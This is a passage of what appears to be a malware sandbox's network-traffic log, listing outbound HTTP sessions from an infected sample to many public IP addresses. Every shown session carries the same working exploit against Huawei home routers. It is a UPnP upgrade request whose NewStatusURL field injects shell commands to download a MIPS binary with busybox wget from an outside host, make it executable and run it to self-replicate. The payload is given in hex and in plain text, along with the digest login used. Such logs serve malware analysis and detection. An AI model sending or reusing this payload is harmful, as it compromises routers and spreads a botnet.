                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1481192.168.2.2342718157.186.183.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542774916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1482192.168.2.2337328157.60.87.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542783022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1483192.168.2.2344570197.125.127.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.542790890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1484192.168.2.2338602197.47.6.13837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543128014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1485192.168.2.2359444218.51.60.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543131113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1486192.168.2.2343576219.203.58.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543163061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1487192.168.2.233661441.233.187.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543169975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1488192.168.2.233931241.212.127.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543178082 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1489192.168.2.2350030218.71.167.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543179035 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1490192.168.2.2355974197.226.43.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543212891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
